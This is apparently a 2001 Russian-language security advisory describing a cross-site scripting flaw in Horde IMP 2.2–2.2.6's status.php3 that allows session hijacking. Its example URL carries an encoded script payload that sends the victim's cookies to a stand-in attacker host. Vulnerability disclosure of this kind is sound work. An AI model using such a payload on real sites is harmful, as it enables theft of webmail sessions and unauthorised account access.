Security Lab

Перехват сеанса в Horde IMP

Дата публикации:14.11.2001
Всего просмотров:1295
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

IMP – мощный, почтовый web-интерфейс/клиент, разработанный членами проекта Horde. Проблема связанна с тем, что закодированные HTML-теги не удаляются из запросов, при обращении к 'status.php3'. Это позволяет удаленному нападающему, создать ссылку, которая при нажатии заставит выполняется произвольный скрипт в броузере не подозревающего пользователя в контексте сайта, выполняющего Horde IMP.
Эта проблема может эксплуатироваться, чтобы перехватывать куки-основанную аутентификацию, и получать несанкционированный доступ к учетной записи webmail такого пользователя.

Уязвимость работает в Horde IMP 2.2 - 2.2.6

Пример:
http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.com%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%20%27%3E%27)%3B%3C%2Fscript%3E%0A

Подробнее об уязвимостях данного типа можно прочитать здесь:
http://www.securitylab.ru/owasp/owasp-iv-css-1.htm
http://www.securitylab.ru/owasp/owasp-sm-sh-1.htm
http://www.securitylab.ru/owasp/OWASP-SM-SR-1.htm